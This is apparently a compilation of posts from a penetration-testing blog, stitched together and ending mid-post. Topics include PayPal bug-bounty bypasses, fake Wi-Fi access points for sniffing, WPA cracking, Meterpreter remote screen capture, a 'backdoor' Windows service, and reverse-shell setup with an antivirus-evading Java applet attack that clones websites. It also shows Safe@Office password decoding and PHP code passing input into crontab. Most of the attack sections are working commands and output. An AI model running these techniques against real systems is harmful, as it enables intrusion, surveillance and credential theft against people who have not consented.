If you want to know what Resolver is you can read about it Here.

What is new and why its called the “Bug Hunters Edition” ?

Well…When participating in a bug bounty programs you may want to find  as much  domains and sub domains of the company as you can, but not just any sub domain, preferably those which are web servers hosting a web app.

When preforming sub domains brute force you may end up with a long list of sub domains, now you will need to start and probe each result to test if it is a web server or not, In addition to the previous version of Resolver capabilities I added specially for this task Auto check for HTTP/HTTPS for every sub domain found  And Bing ip search in order to find which domains (sites) are hosted on a single ip address , all results can be exported to a text file in a grepable format.

* Please notice, you will need to register with Microsoft to obtain a bing api key in order to use the bing ip search feature

With these new features Resolver can be pretty useful tool for you hunters out there and save a lot of time in the quest for searching new places to explore.

Screenshots:

The new version can be downloaded from source forge:

Happy Hunting

Poking around the app I found there’s an admin panel login page by adding /admin to the URL (https://apac.paypal-labs.com/gesture/admin/login.php)

I was presented with a login form, which required a user name and password in order to access the admin panel.

I tried some common page names in the URL such as https://apac.paypal-labs.com/gesture/admin/index.php and I noticed I was redirected back to the “login.php” page.

I fired up Burp and intercepted the request to “index.php”, next I forwarded the request and intercepted the page response, I noticed the “HTTP/1.1 302 Found” code in the http header and below the header I noticed there is lots of html code.

I changed the Response header to “HTTP/1.1 200 Found” and forwarded the response and to my surprise I was presented with the admin panel content which allowed me full access to all pages and features (I would have to change each request response to “200” for each page I was trying to access).

I reported this issue to PayPal, The application was removed immediately and is no longer available.

Here’s a video of the process of exploiting this vulnerability:

Paypal Gesture Pay Admin Panel Authentication Bypass from NightRanger on Vimeo.

Although this was a Blackbox test and I didn’t had any access to the page source code I could tell why this issue occurred.

Here is a sample code, which illustrates the issue:

The above code checks if the user has established a session and if not redirects the user back to the login page, the problem is that the content of the page, which contains this code, is also displayed in the process of redirection because further script execution was not terminated.

And here is a simple fix:

There is a way to browse the admin panel without the need to change the response code manually using burp suite.
You can configure burp to do so using the following steps:

1. Go to Proxy Tab –> Options Tab –> Match and Replace.
2. Click the “Add” button.
3. Enter the following setting:

Type: Response Header
Match: 302 Found
Replace: 200 Found

I made a simple demo showing the process of exploiting the same issue using burp auto replacement feature:

Authentication Bypass Example Using Burp from NightRanger on Vimeo.

Vulnerability Details:

An attacker is able to inject and execute a malicious payload on a remote user account without the need to convince the victim to click anything, it only requires the user to login to his PayPal account.

The vulnerability is caused due to the lack of input validation and sanitization of the “Business Name” field.

This issue enables the attacker to change his business name to a malicious Javascript payload, this will cause for a Stored (Self) XSS to trigger in the attacker account under his Profile – Account Information – Street Address.
I was looking for a way to trigger this XSS on a remote user account and found that the payload can also be triggered by sending a Payment request.

These are the steps that were required in order to exploit this issue :

1. The attacker change his business name to a malicious javascript payload.
2. The attacker sends a payment request to the victim.
3. Once the user logs in to his account the payment request appears on the “Recent Activities” chart which loads on the main account page.
4. The XSS triggers on the user automatically when it tries to load the attacker business name.

I would like to thank PayPal for the opportunity to participate in this wonderful program and rewarding me for this bug.

**** This bug is already been fixed! ****

PayPal Stored XSS via Request Payment feature or “How to inject a malicious payload remotely into users accounts” from NightRanger on Vimeo.

Although I love Backtrack Linux one of the tools I really miss is Cain & Able, I thought some of you will want to setup a Fake AP when Pentesting on Windows systems as well.

So, here it goes…

I am using an Alfa AWUS036H wlan usb adapter, This adapter works great under Backtrack and Windows systems, It is also fully supported with the Air-crack ng tool suit.

In order to use this adapter under Windows systems you will need  to download it’s driver 

After installing the driver you will find that the Alfa wireless LAN utility was also installed on your system.

This utility has a nice feature which enables you to specify the mode of operation

the two modes available are “Station Mode” and “Access Point Mode”

In order to use the AP mode you will need a second LAN/WLAN Adapter which will be connected to the internet, The utility will switch to AP mode and will enable “Internet Connection Sharing”

Now all is left is to configure your AP SSID and Channel number

That’s it you have a Working Access point!

You can see connected clients in the utility “General” tab:

Now we fire up “Cain” choose the Alfa interface and start the sniffer

In order to capture SSL traffic you will need to enable “APR”

There are a lot of Tutorials and Scripts for setting up a Fake AP,  The “Gerix”  tool also have an option to auto set a Fake AP (for some reason this tool never worked for me).

I started to setup my fake AP and had run into some trouble for a strange reason.

I decided to put my experience here hopefully you’ll find it useful.

Started by putting my Wlan interface in monitor mode

root@Blackbox:~/fakeap# airmon-ng start wlan1
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
1558    dhclient
Interface       Chipset         Driver
wlan1           Realtek RTL8187L        rtl8187 - [phy1]SIOCSIFFLAGS: Unknown error 132
                                (monitor mode enabled on mon0)

I noticed the following error: “Unknown error 132″
Tried using airodump-ng to see what happens…

root@Blackbox:~/fakeap# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Unknown error 132

Got the same error.

The solution was simply to unload the RTL8187 and Load the R8187 driver instead as follows:

root@Blackbox:~/fakeap# rmmod rtl8187
root@Blackbox:~/fakeap# modprobe r8187

Tried putting wlan In monitor mode again

root@Blackbox:~/fakeap# airmon-ng start wlan1
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
1558    dhclient
Interface       Chipset         Driver
wlan1           RTL8187         r8187 (monitor mode enabled)

Well, that fixed the problem

root@Blackbox:~/fakeap# iwconfig
lo        no wireless extensions.
eth3      no wireless extensions.
wlan1     802.11b/g  Mode:Monitor  Channel=10  Bit Rate=11 Mb/s
          Tx-Power=5 dBm
          Retry:on   Fragment thr:off
          Link Quality=0/100  Signal level=50 dBm  Noise level=-156 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Now we can proceed to the fake ap setup process

1. Install a DHCP Server

apt-get install dhcp3-server

2. Edit “/etc/dhcp3/dhcpd.conf” as follows (You can change ip address, pool and dns server as needed):

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}

3. Put your wlan in monitor mode

airmon-ng start wlan1

4. Start airbase-ng, you will need to specify the AP SSID and channel number

airbase-ng -e FreeWifi -c 11 -v wlan1 &

5. Airbase will create a new adapter “at0″ you will need to enable it and assign it with an ip address and subnet mask, the ip address you assign to this interface will be the default gateway that you specified in the dhcpd.conf file.

ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0

6. Add a route

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

7. Setup ip tables

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT

• Eth3 is my external interface which is connected to the internet change it to whatever yours is

iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE

8. Clear dhcp leases

echo > '/var/lib/dhcp3/dhcpd.leases'

9. Create a symlink to dhcpd.pid (skipping this may cause an error when starting dhcp server)

ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid

10. Start the DHCP server

dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

11. Don’t forget to enable IP forwarding

echo "1" > /proc/sys/net/ipv4/ip_forward

That’s All Folks!

I have created a simple bash script to automate this process you will just need to change it  to suit your configuration.

Usually I use Linux which has several tools for querying DNS, One of my favourite tools is the “host” command which can be used for this task:

root@bt">root@bt:~# host 8.8.8.8
8.8.8.8.in-addr.arpa domain name pointer google-public-dns-a.google.com.

Along with some bash scripting it can be used for checking multiple IP’s

I really needed a tool that can do the same on the Windows OS, so i decided to write Resolver…

Resolver features:

• Resolve a Single IP
• Resolve an IP Range
• Resolve IP’s provided in a text file
• Export Results to a text file
• Copy results to Clipboard
• DNS Records brute force

Version has been updated to 1.0.2

• Added auto copy to clipboard when resolving a single ip
• Added the ability to copy a selected row using mouse double click in range / list mode
• Added IP address Validation in single IP and IP range modes

Version has been updated to 1.0.3

• Added DNS Records dictionary brute force
• Made some changes to GUI

Resolver can be downloaded from here:

I really liked the Offensive security Crackpot online hash cracker and  i thought it would  be really nice to have a web interface for my rainbow tables which i can access from web anywhere without having to carry them with me whenever i need them.

When cracking lm/ntlm hashes i really like using Ophcrack which provides a free GUI and CLI software along with  some free and paid tables.

I wrote a quick and dirty PHP based web frontend for Ophcrack called Wophcrack, I must say i am not a programmer and i  am sure this could be done more efficiently and elegantly, anyway…its working fine , I thought maybe someone will find it useful so i decided to share it here.

Wophcrack was designed to work on Backtrack 4 R2, Although it can be install on any Linux distribution with some small adjustments, Wophcrack can also easily edited to support Rainbow crack.

Please read the requirements and installation notes before using Wophcrack.

Wophcrack will require some manual code adjustments to suite you environment.

Wophcrack Backtrack Installation

root@Blackbox:~/OphcrackWeb# dpkg -i ophcrack-cli_3.3.0-1_i386.deb

root@Blackbox:~# echo www-data > /etc/cron.allow

root@Blackbox:~# update-rc.d cron defaults

root@Blackbox:~# /etc/init.d/cron start

root@Blackbox:~# mysql -u root -p

Enter password:

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 34

Server version: 5.0.67-0ubuntu6 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> CREATE DATABASE cracker;

Query OK, 1 row affected (0.04 sec)

root@Blackbox:/var/www# mysql -u root -p cracker < cracker.sql

root@Blackbox:~# update-rc.d mysql defaults

root@Blackbox:~# /etc/init.d/mysql start

root@Blackbox:~# update-rc.d sendmail defaults

root@Blackbox:~# /etc/init.d/sendmail restart

sendEmail -f cracker@domain.com -u 'Hash Result' -t $mail < /tmp/output.txt

root@Blackbox:~# update-rc.d apache2 defaults

root@Blackbox:~# /etc/init.d/apache start

ophcrack-cli -g -d /pentest/passwords/RainbowTables/ -t /pentest/passwords/RainbowTables/$1 -f /tmp/temp.txt -o /tmp/output.txt

exec("echo \"* * * * * /var/www/rc.sh " . $info['hashset'] . "\" | crontab -");

php /var/www/check.php

exec("php /var/www/checkagain.php");

exec("echo \"* * * * * /var/www/rc.sh " . $info['hashset'] . "\" | crontab -");

I uploaded the  wrong file version by mistake, Sorry for the inconvenience.

You can download Wophcrack Source Here:

afer that attack i decided to move the blog to a more controlled hosting environment with the ability to manage logs and security measures.

due to the new security measures taken visitors may experience trouble accessing certain areas or preforming various operations on the blog

i am sorry for any inconvertible that it may cause.

Please let me know of you are getting error pages, getting blocked for any reason so i could fix it.

it may take some time till all security measures are properly implemented without causing any trouble for visitors.

for any question or problem please contact me at :  s h a i [at] e x p lo i t . c o . i l

appreciate your understanding.

Shai.

The script was written by Roni Bachar, You can read the official release notes on his Blog.

This Meterpreter script captures images on remote host desktop at a predefined interval and then displays the images sequence .

This emulates a live view of the remote host desktop, I have tested the script under ubuntu 10.04 64 bit system and it is working great on a lan connection, The display rate can be optimized for a wan connection by adjusting the delay setting:

meterpreter > run screenspy -h

Screenspy v1.0
--------------

Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long.
Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long.
Usage: bgrun screenspy -s windows -d 1 -t 60 => will take interactive Screenshot every 1 sec for 1 min long, windows local mode.

Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com

OPTIONS:

    -d   The Delay in seconds between each screenshot.
    -h        Help menu.
    -s   The local system linux/windows
    -t   The time to run in sec.

Here is a video demo of the script:

The script should work on linux and windows version of Metasploit you can get the latest version here:

Update:

New feature added to the script by Xavier Poli, Recording of live session by rendering the images into an avi video file .

bgrun screenspy.rb -v -i -t 20 -d 1 => will only take interactive Screenshot every sec for 20 sec long. Verbose mode activated.
bgrun screenspy.rb -v -i -t 60 -d 5 => will only take interactive Screenshot every 5 sec for 1 min long. Verbose mode activated.
bgrun screenspy.rb -v -i -s windows -d 1 -t 60 => will only take interactive Screenshot every 1 sec for 1 min long, windows local mode. Verbose mode activated.
bgrun screenspy.rb -v -r -t 20 -d 1 => will only generate a recorded video (20 sec long, 1 screenshot every sec) of the session at the end with a default resolution at 640x480. Verbose mode activated.
bgrun screenspy.rb -v -i -r -t 20 -x 800x600 -d 1 => will take interactive Screenshot every sec for 20 sec long and will generate a recorded video of the session at the end with a 800x600 resolution. Verbose mode activated.

watch his video :

Get the latest version of the script:

Doing it manually…

1. Create the service

sc create backdoor binPath= "cmd /K start c:\windows\system32\backdoor.exe" start= auto error= ignore

2. Start the service

net start backdoor

This method should work on both Win XP and Win 7, The only disadvantage is that this command requires administrative or system privileges.
Metasploit comes with many useful meterpreter scripts, I was surprised that it does not include an automated way to create a system service,

I decided to create one on my own and share it with ya all.

I would like to thank Humble Desser for tweaking the script and adding the ability to use service names with spaces and a service description.

hope you’ll find it useful

meterpreter > getuid
Server username: COMPUTER\Administrator

meterpreter > run sc -n "metasploit service" -d "reverse shell meterpreter service" -p c:\\pay.exe
[*] Creating Service meter...
[*] Starting the meter Service...
[*] Service meter Successfully Created...
meterpreter >
[*] Sending stage (749056 bytes) to 192.168.1.107
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.107:1091) at 2010-10-16 14:56:23 +0200

Meterpreter Script – Windows Service Creator from NightRanger on Vimeo.

Download The Script here:

I created a WebApp vulnerable to SQL Injection for my personal use, The result was an extremely vulnerable web site which I could test some SQLi techniques against MySQL.

I must confess, I am not a programmer and I have never coded in PHP before, I thought it would be a good practice to develop a PHP based site from scratch in order to learn the basic of PHP and MySQL.

exploit.co.il Vulnerable Web app designed as a learning platform to test various SQL injection Techniques and it is a fully functional web site with a content management system based on fckeditor.

I thought some of you may find it useful so i decided to share it via a SourceForge project page i created for it  at :

https://sourceforge.net/projects/exploitcoilvuln

Please report bugs to:  shai [ a t ] e  x p  l o i t  . c . o . i l

Read Me First

General Information

Installation Notes

Linux Installation

root@BlackBox:/var/www$ tar -xzvf exploit-wa.tar.gz

root@BlackBox:/var/www$ nano config.php
root@BlackBox:/var/www$ nano admin/config.php

root@BlackBox:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or g.
Your MySQL connection id is 1662
Server version: 5.1.41-3ubuntu12.6 (Ubuntu)

Type "help;" or "h" for help. Type "c" to clear the current input statement.

mysql> CREATE DATABASE exploit;
Query OK, 1 row affected (0.00 sec)

root@BlackBox:/var/www/database$ mysql -u root -p exploit < exploit.sql

root@BlackBox:~# cd /var/www/admin/fckeditor/editor/filemanager/connectors/php/
root@BlackBox:/var/www/admin/fckeditor/editor/filemanager/connectors/php# nano config.php

root@BlackBox:/var/www$ chmod 777 -R admin/

Windows Installation

VMware Image

ScreenShots

Spoilers

I wanted to check my new Core i7 PC and GPU cracking capabilities and speed on my UBUNTU 10.04 64bit OS.

Pyrit supports WPA cracking with Cowpatty, At first i decided to do some benchmarking for different tools with and without cuda.

I fired up airodump-ng, Captured my own router handshake and tried to crack it using cowpatty with a dictionary file.
everytime i tried to crack it i got the following error:

root@BlackBox:/tmp/cowpatty#./cowpatty -f passwords.txt -r black.cap-01.cap -s Blackstar
cowpatty 4.6 - WPA-PSK dictionary attack.
End of pcap capture file, incomplete four-way handshake exchange. Try using a
different capture.

At first i thought something went wrong with the handshake capture so i tried capturing it several time, but no luck with cowpatty, I checked the capture file using pyrit and wireshark just to make sure the handshake was captured correctly (although it did worked fine with aircrack-ng).

root@BlackBox:/tmp/cowpatty# pyrit -r black.cap-01.cap analyze
Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'black.cap-01.cap' (1/1)...
297 packets (297 802.11-packets), 1 APs
#1: AccessPoint 00:23:69:c0:be:ce ('Blackstar')
#0: Station 00:23:76:ad:54:00, handshake found
#1: Station 01:00:5e:7f:ff:fa

After some googling I found a patch to fix this cowpatty issue here: http://proton.cygnusx-1.org/~edgan/cowpatty/

Applying the patch is simple, Just follow these steps:

1. Apply the patch

root@BlackBox:/tmp/cowpatty#patch < cowpatty-4.6-fixup16.patch
patching file cowpatty.c
patching file cowpatty.h

2. Compile Cowpatty

root@BlackBox:/tmp/cowpatty#make
cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o cowpatty.o cowpatty.c
cowpatty.c: In function ‘dictfile_attack’:
cowpatty.c:908: warning: format ‘%u’ expects type ‘unsigned int’, but argument 3 has type ‘size_t’
cowpatty.c: In function ‘main’:
cowpatty.c:1133: warning: dereferencing pointer ‘eapkeypacket’ does break strict-aliasing rules
cowpatty.c:1129: note: initialized from here
cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb cowpatty.c -o cowpatty utils.o md5.o sha1.o -lpcap -lcrypto
cowpatty.c: In function ‘dictfile_attack’:
cowpatty.c:908: warning: format ‘%u’ expects type ‘unsigned int’, but argument 3 has type ‘size_t’
cowpatty.c: In function ‘main’:
cowpatty.c:1133: warning: dereferencing pointer ‘eapkeypacket’ does break strict-aliasing rules
cowpatty.c:1129: note: initialized from here
cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb genpmk.c -o genpmk utils.o sha1.o -lpcap -lcrypto
genpmk.c: In function ‘main’:
genpmk.c:250: warning: format ‘%u’ expects type ‘unsigned int’, but argument 3 has type ‘size_t’

root@BlackBox:/tmp/cowpatty#make install
install -d /usr/local/bin
install -m 755 cowpatty genpmk /usr/local/bin

3. Testing the compiled cowpatty binaries

root@BlackBox:/tmp/cowpatty#./cowpatty -f passwords.txt -r black.cap-01.cap -s Blackstar
cowpatty 4.6 - WPA-PSK dictionary attack.
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack.  Please be patient.
key no. 1000: achalasia
key no. 2000: admittable
key no. 3000: aglipayan
key no. 4000: allokurtic
key no. 5000: amphicytula
.....

Works fine…

Get Cowpatty and the patch here:

It supports all the commands supported by the PHP meterpreter, as of SVN revision 9777, and additionally the ipconfig, route, and screenshot commands.

It is not fully implemented into the framework yet and in order to get it up and running some manual tweaking is needed.

In this post I will show how to set it up and use it.

Further more,  I have recreated my “Evil java applet wizard” to automate the the process of getting it up and running.

The script now supports a full java attack which includes the client side applet attack and uses the meterpreter java payload instead a binary executable.

Why using a java meterpreter you ask ?

Well…you’ll see later…

Requirements:

JRE 1.2 on the victim machine is enough although some features, like routing tables or screenshots, require JRE 1.3, JRE 1.4 or JRE 1.6.

You can find the java meterpreter payload jar file in:

"/pentest/exploits/framework3/data/java/loader.jar"

You will also need the “JavaMeterpreter.zip” file which you can download from HERE

I have just noticed that manual tweaking is no longer necessary the Metasploit framework now has the java meterpreter listener built in.

That means you can skip steps 1 to 4

and instead of using the patched php meterpreter you can use the java meterpreter directly.

I have also updated the script to use the java payload as well.

| |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 578 exploits - 297 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r10024 updated today (2010.08.17)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

Name  Current Setting  Required  Description
----  ---------------  --------  -----------

Payload options (java/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Wildcard Target

msf exploit(handler) >

Lets see how to set it up manually...

1. Download

root@Blackbox:~# cd /tmp/
root@Blackbox:/tmp# wget https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip --no-check-certificate

2. Unzip

root@Blackbox:/tmp# unzip JavaMeterpreter.zip

3. Copy necessary files

root@Blackbox:/tmp# cd extensions/
root@Blackbox:/tmp/extensions# cp {ext_server_stdapi.jar,meterpreter.jar} /pentest/exploits/framework3/data/meterpreter

4. Backup PHP Meterpreter files and Change jar files extensions to php (This will break PHP Meterpreter support)

root@Blackbox:/tmp/extensions# cd /pentest/exploits/framework3/data/meterpreter

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.php meterpreter.phpx

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.php ext_server_stdapi.phpx

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.jar meterpreter.php

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.jar ext_server_stdapi.php

5. Launch msfconsole and setup a multi/handler listener with a "php/meterpreter/reverse_tcp" payload.

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# cd ..
root@Blackbox:/pentest/exploits/framework3/data# cd ..
root@Blackbox:/pentest/exploits/framework3# ./msfconsole

__.                       .__.        .__. __.
_____   _____/  |______    ____________ |  |   ____ |__|/  |_
/     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
\/     \/          \/     \/ |__|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 577 exploits - 295 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9993 updated today (2010.08.13)

msf > use exploit/multi/handler
smsf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...

6. Copy (transfer) “/pentest/exploits/framework3/data/java/loader.jar” to victim pc and run it as follows

C:\Documents and Settings\NightRanger>java -jar loader.jar
Usage: java -jar loader.jar   []

C:\Documents and Settings\NightRanger>java -jar loader.jar 192.168.1.104 4444

7. Get your Meterpreter JAVA Shell…

[*] Sending stage (21717 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.106:1435) at Sat Aug 14 20:34:57 +0300 2010

meterpreter > sysinfo
Computer: exploit
OS      : Windows XP 5.1 (x86)
meterpreter > getuid
Server username: NightRanger
meterpreter >

P.S:

The java meterpreter will work for linux systems as well….

root@Blackbox:/pentest/exploits/framework3/data/java# java -jar loader.jar 192.168.1.104 4444

meterpreter > exit

[*] Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > rexploit

[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (21717 bytes) to 192.168.1.104
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.104:59806) at Sat Aug 14 20:47:40 +0300 2010

meterpreter > sysinfo
Computer: Blackbox
OS      : Linux 2.6.34 (i386)
meterpreter > getuid
Server username: root
meterpreter >

I have modified my “Evil Java Applet Wizard” script to use the JAVA Meterpreter Payload instead of a binary executable.

The reasons for that are:

1. Antivirus software will not detect JAVA Meterpreter as a malicious file (as you can see in the demo video below).

2. It make sense to use the Java Meterpreter payload if you are already using athe JAVA Applet client side attack vector.

If it worked it means that the victim has Java installed on his system which allowes us to use this payload.

Demo:

Metasploit JAVA Meterpreter from NightRanger on Vimeo.

Script requirements are:

#!/usr/bin/python

'''
Created on Jul 4, 2010
Code Updated on Aug 17, 2010

@Author: NightRanger, http://exploit.co.il

This script designed and tested on BackTrack 4 final with metasploit v3.4.2-dev

Requirements:

JAVA JDK: Install using: "apt-get install sun-java6-jdk"
Meterpreter JAVA Payload (loader.jar) must exist in: "/pentest/exploits/framework3/data/java/loader.jar"

Script features:
----------------

- Generates java applet code on the fly
- Generates Keystore / Keystore Removal
- Compiles applet code
- Package and sings JAR file
- Web site cloning
- Generates applet html code
- Creates a meterpreter JAVA payload
- Starts apache web server
- Starts MSFConsole listener

* Java applet source code found in the wild, decompiled and tweaked.
* Website clone wget syntax taken from SET.
'''

Download the script :

The script is designed for attacking windows operating systems

References:

https://www.metasploit.com/redmine/issues/406

http://schierlm.users.sourceforge.net/JavaPayload/

http://www.metasploit.com/modules/payload/java/meterpreter/reverse_tcp

http://seclists.org/metasploit/2010/q3/134

The article is in the Hebrew language and covers the basics of buffer overflows,fuzzing,olly basics,writing a metasploit modules and more…

The article has a companion tar.gz file which includes the source code of the vulnerable server (Which was ported into the windows os and customize for the magazine) , a metasploit exploit module and template,  some of the tools used and some other goodies…

I hope i’ll find the time to rewrite it in english and publish it here on the blog as well.

I would like to thank cp77fk4r for giving me the opportunity to write this article and for all the help and support, I really appreciate it!

You can manage the Safe@Office (SBOX) via a web interface or SSH, This product has several passwords stored in its configuration such as:

1. User passwords

2. VPN Passwords

3. Internet connection passwords

When connecting to the device using SSH and running the “show users” command, we can see all configured users and their settings, for example:

exploit@blackbox >ssh admin@sbox.exploit.co.il
admin@sbox.exploit.co.il's password:
Welcome to Safe@Office 500WP, unlimited nodes, Evaluation Version 8.0.42x 00:08:da:77:53:fa
00-08-da-77-53-fa >show users

name user
password {S}PS43OjF5NyBH
adminaccess readonly
vpnaccess false
filteroverride false
hotspotaccess false
rdpaccess false
users-manager false
networkaccess false
expire never

As you can see above the password is encrypted.

In this post I will show the process of decoding the password to its original form.

First of all I must thank Yoni.d for breaking it, sharing it and allowing me to publish his finding.

I will walk through the process Yoni used to crack it and at the end of the post you can download a python script which you can use to decode these passwords.

Lets start…

At first glance the password encoding scheme looks familiar,  It looks like Base64 Encoding.

Well,  Thats too easy right?,  Lets use python to decode it:

>>> import base64
>>> d = base64.b64decode("XH13fXM=")
>>> print d

\}w}s

The result is another encoded string (argh…),  We will also need to find which encoding was used for it.
SBOX allows us to create a password of 5 to 25 chars long,  Lets create a password of 5 chars made all of zeros: “00000“.
Our password will be encoded to: XX90eXY=

Lets decode our newly created password:

>>> import base64
>>> d = base64.b64decode("XX90eXY=")
>>> len(d)
5
>>> print d
]tyv
>>> print repr(d)
']\x7ftyv'

We can see our decoded string length is the same as our original password length which is 5 chars.
This lead us to believe that the encoding used for this password is XOR.

Here’s what we know this far:

1. The password (00000)
2. The password base64 encoded form
3. The password base64 decoded form

If the decoded string was indeed xor’d then the same key is used for encoding and decoding
here hows xor works:

X := X XOR Y
Y := X XOR Y
X := X XOR Y

You can read more about XOR at Wikipedia

We will XOR the 2nd encoded string using “0″ in order to find the key that was initially used to encode it.

Lets find the decimal ASCII value of  ”0″:

>>> ord("0")
48

We will also convert our decoded base64 string to its ASCII decimal values:

>>> import base64
>>> d = base64.b64decode("XX90eXY=")
>>> for char in d:
...     print ord(char),
...
93 127 116 121 118

Now we will XOR each char with 48 (which is “o“)

>>> for char in d:
...     print ord(char)^48,
...
109 79 68 73 70

Let’s convert these values to ASCII decimal values:

>>> for char in d:
...     x = ord(char)^48
...     print chr(x),
...
m O D I F

Well, The key for our 5 chars password is : “mODIF”
Next step is to create a full 25 chars password made all of zeros in order to find the whole key

Here is the base64 encoded 25 zeros password:

XX90eXZ5dXRWZ0Bif2B1YmRpQ3h1dWRHeQ==

>>> import base64
>>> d = base64.b64decode("XX90eXZ5dXRWZ0Bif2B1YmRpQ3h1dWRHeQ==")
>>> len(d)
25
>>> for char in d:
...     x = ord(char)^48
...     print chr(x),
...
m O D I F I E D f W p R O P E R T Y s H E E T w I

We found the whole key which is:  ”mODIFIEDfWpROPERTYsHEETwI”
Now that we found the key used to encode our password we can use it to decode it.

>>> import base64,sys
>>> key = ["m" ,"O" ,"D" ,"I" ,"F" ,"I" ,"E" ,"D" ,"f" ,"W" ,"p" ,"R" ,"O" ,"P" ,"E" ,"R" ,"T" ,"Y" ,"s" ,"H" ,"E" ,"E" ,"T" ,"w" ,"I"]
>>> d = base64.b64decode("XX90eXZ5dXRWZ0Bif2B1YmRpQ3h1dWRHeQ==")
>>> count = 0
>>> for char in d:
...     x = ord(char)
...     y = ord(key[count])
...     i = x^y
...     z = chr(i)
...     print z,
...     count += 1
...
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

Whoohoo…It worked!

Lets try to decode another password, i created the password: “Passw0rd!“ which was encoded to “PS43OjF5NyBH“, lets decode it…

>>> import base64,sys
>>> key = ["m" ,"O" ,"D" ,"I" ,"F" ,"I" ,"E" ,"D" ,"f" ,"W" ,"p" ,"R" ,"O" ,"P" ,"E" ,"R" ,"T" ,"Y" ,"s" ,"H" ,"E" ,"E" ,"T" ,"w" ,"I"]
>>> d = base64.b64decode("PS43OjF5NyBH")
>>> count = 0
>>> for char in d:
...     x = ord(char)
...     y = ord(key[count])
...     i = x^y
...     z = chr(i)
...     print z,
...     count += 1
...
P a s s w 0 r d !

Great it was decoded correctly.

After trying to decode several passwords we’ll encounter an exception with this password: “jhBu1232” which was encoded to “hyeGPHd7dnY=”

>>> import base64,sys
>>> key = ["m" ,"O" ,"D" ,"I" ,"F" ,"I" ,"E" ,"D" ,"f" ,"W" ,"p" ,"R" ,"O" ,"P" ,"E" ,"R" ,"T" ,"Y" ,"s" ,"H" ,"E" ,"E" ,"T" ,"w" ,"I"]
>>> d = base64.b64decode("hyeGPHd7dnY=")
>>> count = 0
>>> for char in d:
...     x = ord(char)
...     y = ord(key[count])
...     i = x^y
...     z = chr(i)
...     print z,
...     count += 1
...
ê h  u 1 2 3 2

As you can see some chars wasn’t decoded correctly : “êhÂu1232”

Let’s try to figure why by looking at their decimal ASCII values:

>>> for char in d:
...     x = ord(char)
...     y = ord(key[count])
...     i = x^y
...     z = chr(i)
...     print ord(z),
...     count += 1
...
234 104 194 117 49 50 51 50

